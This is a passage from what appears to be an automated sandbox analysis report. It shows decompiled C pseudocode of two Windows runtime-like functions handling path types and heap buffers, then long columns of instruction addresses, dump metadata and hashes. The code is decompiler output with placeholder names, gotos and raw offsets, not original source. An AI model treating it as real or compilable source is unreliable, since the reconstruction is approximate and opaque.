				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x49ad360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E048EF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E048D6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L048D4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E048D6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M048D45F8))) {
												case 0:
													_v568 = 0x4891078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x48911c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L048D4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E048FF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E048FF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E048B52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E048CEB70(1, 0x49a79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E048CAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E048F95D0();
																			L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E048FB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E048F3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E048FB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                            0x048d4128
                                                            0x048d4135
                                                            0x048d413c
                                                            0x048d4141
                                                            0x048d4145
                                                            0x048d4147
                                                            0x048d414e
                                                            0x048d4151
                                                            0x048d4159
                                                            0x048d415c
                                                            0x048d4160
                                                            0x048d4164
                                                            0x048d4168
                                                            0x048d416c
                                                            0x048d417f
                                                            0x048d4181
                                                            0x048d446a
                                                            0x048d446a
                                                            0x048d418c
                                                            0x048d4195
                                                            0x048d4199
                                                            0x048d4432
                                                            0x048d4439
                                                            0x048d443d
                                                            0x048d4442
                                                            0x048d4447
                                                            0x00000000
                                                            0x048d419f
                                                            0x048d41a3
                                                            0x048d41b1
                                                            0x048d41b9
                                                            0x048d41bd
                                                            0x048d45db
                                                            0x048d45db
                                                            0x00000000
                                                            0x048d41c3
                                                            0x048d41c3
                                                            0x048d41ce
                                                            0x048d41d4
                                                            0x0491e138
                                                            0x0491e13e
                                                            0x0491e169
                                                            0x0491e16d
                                                            0x0491e19e
                                                            0x0491e16f
                                                            0x0491e16f
                                                            0x0491e175
                                                            0x0491e179
                                                            0x0491e18f
                                                            0x0491e193
                                                            0x00000000
                                                            0x0491e199
                                                            0x00000000
                                                            0x0491e199
                                                            0x0491e193
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048d41da
                                                            0x048d41da
                                                            0x048d41df
                                                            0x048d41e4
                                                            0x048d41ec
                                                            0x048d4203
                                                            0x048d4207
                                                            0x0491e1fd
                                                            0x048d4222
                                                            0x048d4226
                                                            0x0491e1f3
                                                            0x0491e1f3
                                                            0x048d422c
                                                            0x048d422c
                                                            0x048d4233
                                                            0x0491e1ed
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048d4239
                                                            0x048d4239
                                                            0x048d4239
                                                            0x048d4239
                                                            0x048d4233
                                                            0x048d4226
                                                            0x048d41ee
                                                            0x048d41ee
                                                            0x048d41f4
                                                            0x048d4575
                                                            0x0491e1b1
                                                            0x0491e1b1
                                                            0x00000000
                                                            0x048d457b
                                                            0x048d457b
                                                            0x048d4582
                                                            0x0491e1ab
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048d4588
                                                            0x048d4588
                                                            0x048d458c
                                                            0x0491e1c4
                                                            0x0491e1c4
                                                            0x00000000
                                                            0x048d4592
                                                            0x048d4592
                                                            0x048d4599
                                                            0x0491e1be
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048d459f
                                                            0x048d459f
                                                            0x048d45a3
                                                            0x0491e1d7
                                                            0x0491e1e4
                                                            0x00000000
                                                            0x048d45a9
                                                            0x048d45a9
                                                            0x048d45b0
                                                            0x0491e1d1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048d45b6
                                                            0x048d45b6
                                                            0x048d45b6
                                                            0x00000000
                                                            0x048d45b6
                                                            0x048d45b0
                                                            0x048d45a3
                                                            0x048d4599
                                                            0x048d458c
                                                            0x048d4582
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048d41f4
                                                            0x048d423e
                                                            0x048d4241
                                                            0x048d45c0
                                                            0x048d45c4
                                                            0x00000000
                                                            0x048d45ca
                                                            0x048d45ca
                                                            0x00000000
                                                            0x0491e207
                                                            0x0491e20f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048d45d1
                                                            0x00000000
                                                            0x00000000
                                                            0x048d45ca
                                                            0x00000000
                                                            0x048d4247
                                                            0x048d4247
                                                            0x048d4247
                                                            0x048d4249
                                                            0x048d4249
                                                            0x048d4249
                                                            0x048d4251
                                                            0x048d4251
                                                            0x048d4257
                                                            0x048d425f
                                                            0x048d426e
                                                            0x048d4270
                                                            0x048d427a
                                                            0x0491e219
                                                            0x0491e219
                                                            0x048d4280
                                                            0x048d4282
                                                            0x048d4456
                                                            0x048d45ea
                                                            0x00000000
                                                            0x048d45f0
                                                            0x0491e223
                                                            0x00000000
                                                            0x0491e223
                                                            0x048d445c
                                                            0x048d445c
                                                            0x00000000
                                                            0x048d445c
                                                            0x00000000
                                                            0x048d4288
                                                            0x048d428c
                                                            0x0491e298
                                                            0x048d4292
                                                            0x048d4292
                                                            0x048d429e
                                                            0x048d42a3
                                                            0x048d42a7
                                                            0x048d42ac
                                                            0x0491e22d
                                                            0x048d42b2
                                                            0x048d42b2
                                                            0x048d42b9
                                                            0x048d42bc
                                                            0x048d42c2
                                                            0x048d42ca
                                                            0x048d42cd
                                                            0x048d42cd
                                                            0x048d42d4
                                                            0x048d433f
                                                            0x048d433f
                                                            0x048d42d6
                                                            0x048d42d6
                                                            0x048d42d9
                                                            0x048d42dd
                                                            0x048d42eb
                                                            0x0491e23a
                                                            0x048d42f1
                                                            0x048d4305
                                                            0x048d430d
                                                            0x048d4315
                                                            0x048d4318
                                                            0x048d431f
                                                            0x048d4322
                                                            0x048d432e
                                                            0x048d433b
                                                            0x048d433b
                                                            0x00000000
                                                            0x048d432e
                                                            0x048d42eb
                                                            0x048d434c
                                                            0x048d434e
                                                            0x048d4352
                                                            0x048d4359
                                                            0x048d435e
                                                            0x048d4361
                                                            0x048d436e
                                                            0x048d438a
                                                            0x048d438e
                                                            0x048d4396
                                                            0x048d439e
                                                            0x048d43a1
                                                            0x048d43ad
                                                            0x048d43bb
                                                            0x048d43bb
                                                            0x048d43ad
                                                            0x048d436e
                                                            0x048d43bf
                                                            0x048d43c5
                                                            0x048d4463
                                                            0x048d4463
                                                            0x048d43ce
                                                            0x048d43d5
                                                            0x048d43d9
                                                            0x048d43df
                                                            0x048d4475
                                                            0x048d4479
                                                            0x048d4491
                                                            0x048d4491
                                                            0x048d4479
                                                            0x048d43e5
                                                            0x048d43eb
                                                            0x048d43f4
                                                            0x048d43f6
                                                            0x048d43f9
                                                            0x048d43fc
                                                            0x048d43ff
                                                            0x048d44e8
                                                            0x048d44ed
                                                            0x048d44f3
                                                            0x0491e247
                                                            0x00000000
                                                            0x048d44f9
                                                            0x048d4504
                                                            0x048d4508
                                                            0x048d450f
                                                            0x0491e269
                                                            0x00000000
                                                            0x048d4515
                                                            0x048d4519
                                                            0x048d4531
                                                            0x048d4534
                                                            0x048d4537
                                                            0x048d453e
                                                            0x048d4541
                                                            0x048d454a
                                                            0x0491e255
                                                            0x0491e255
                                                            0x0491e25b
                                                            0x0491e25e
                                                            0x0491e261
                                                            0x0491e261
                                                            0x048d4555
                                                            0x048d4559
                                                            0x048d455d
                                                            0x0491e26d
                                                            0x0491e270
                                                            0x0491e274
                                                            0x0491e27a
                                                            0x0491e27d
                                                            0x0491e28e
                                                            0x0491e28e
                                                            0x048d4563
                                                            0x048d4563
                                                            0x048d4569
                                                            0x048d4569
                                                            0x00000000
                                                            0x048d455d
                                                            0x048d450f
                                                            0x00000000
                                                            0x048d44f3
                                                            0x048d43ff
                                                            0x048d4405
                                                            0x048d4405
                                                            0x048d4405
                                                            0x048d42ac
                                                            0x048d428c
                                                            0x048d4282
                                                            0x048d4407
                                                            0x048d440d
                                                            0x0491e2af
                                                            0x0491e2af
                                                            0x048d4413
                                                            0x048d4413
                                                            0x00000000
                                                            0x048d41d4
                                                            0x00000000
                                                            0x048d41c3
                                                            0x048d41bd
                                                            0x048d4415
                                                            0x048d4415
                                                            0x048d4416
                                                            0x048d4417
                                                            0x048d4429
                                                            0x048d416e
                                                            0x048d416e
                                                            0x048d4175
                                                            0x048d4498
                                                            0x048d449f
                                                            0x0491e12d
                                                            0x00000000
                                                            0x0491e133
                                                            0x00000000
                                                            0x0491e133
                                                            0x048d44a5
                                                            0x048d44a5
                                                            0x048d44aa
                                                            0x00000000
                                                            0x048d44bb
                                                            0x048d44ca
                                                            0x048d44d6
                                                            0x048d44d7
                                                            0x048d44d8
                                                            0x048d44e3
                                                            0x048d44e3
                                                            0x048d44aa
                                                            0x048d417b
                                                            0x048d417b
                                                            0x048d417b
                                                            0x00000000
                                                            0x048d417b
                                                            0x048d4175
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76d8c9e0b0d40794749c18fc9e1474c6cf6854a62728fe3280f056ba60e79738
                                                            • Instruction ID: 8a43dcb0cf306fd350570cd1a932c619e39d959106258bded49c07ea03af50da
                                                            • Opcode Fuzzy Hash: 76d8c9e0b0d40794749c18fc9e1474c6cf6854a62728fe3280f056ba60e79738
                                                            • Instruction Fuzzy Hash: 59F16F706092558BDB14CF19C490A3AB7F1FF88B18F544E2EF886C7260E734E895DB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048C849B, Relevance: .3, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
                                                            			E048C849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x498f9c0);
				E0490D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x49a7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E048CCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E048D2280( *[fs:0x30], 0x49a8550);
						_t139 =  *0x49a7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E048EF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E048CFFB0(_t193, _t235, 0x49a8550);
								L5:
								return E0490D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E048B1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x49a7b9c; // 0x0
							_t235 = L048D4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x49a7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E048EA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E048CFFB0(_t193, _t235, 0x49a8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L048D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L048D77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x49a7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x49a7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E048F37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x49a7b9c; // 0x0
									_t214 = L048D4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E048F37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x49a7b10 =  *0x49a7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x49a7b04 =  *0x49a7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L048D77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L048D77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x49a7b08 =  *0x49a7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E048F57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E048FF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L048D77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E048EA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L048D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E048F96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                            0x048c849b
                                                            0x048c849b
                                                            0x048c849b
                                                            0x048c849b
                                                            0x048c849d
                                                            0x048c84a2
                                                            0x048c84a7
                                                            0x048c84b1
                                                            0x048c84d8
                                                            0x00000000
                                                            0x048c84b3
                                                            0x048c84c4
                                                            0x048c84c9
                                                            0x048c84cd
                                                            0x048c84cf
                                                            0x048c84cf
                                                            0x048c84d6
                                                            0x048c84e6
                                                            0x048c84e9
                                                            0x048c84ec
                                                            0x048c84ef
                                                            0x048c84f2
                                                            0x048c84f4
                                                            0x048c84fc
                                                            0x048c8501
                                                            0x048c8506
                                                            0x048c8509
                                                            0x048c86e0
                                                            0x048c86e5
                                                            0x048c86e8
                                                            0x048c86ed
                                                            0x048c86f0
                                                            0x048c86f2
                                                            0x04919afd
                                                            0x04919b02
                                                            0x048c84da
                                                            0x048c84df
                                                            0x048c84df
                                                            0x048c86fa
                                                            0x048c86fd
                                                            0x048c86fe
                                                            0x048c8701
                                                            0x048c8706
                                                            0x048c8709
                                                            0x048c870b
                                                            0x00000000
                                                            0x00000000
                                                            0x048c8711
                                                            0x048c8725
                                                            0x048c8727
                                                            0x048c872a
                                                            0x048c872c
                                                            0x04919af0
                                                            0x04919af5
                                                            0x048c8732
                                                            0x048c8732
                                                            0x048c8732
                                                            0x048c8735
                                                            0x048c8737
                                                            0x048c8515
                                                            0x048c8515
                                                            0x048c8518
                                                            0x048c851d
                                                            0x048c8523
                                                            0x048c8527
                                                            0x048c852b
                                                            0x048c8537
                                                            0x048c8539
                                                            0x048c853c
                                                            0x048c853e
                                                            0x048c868c
                                                            0x048c8691
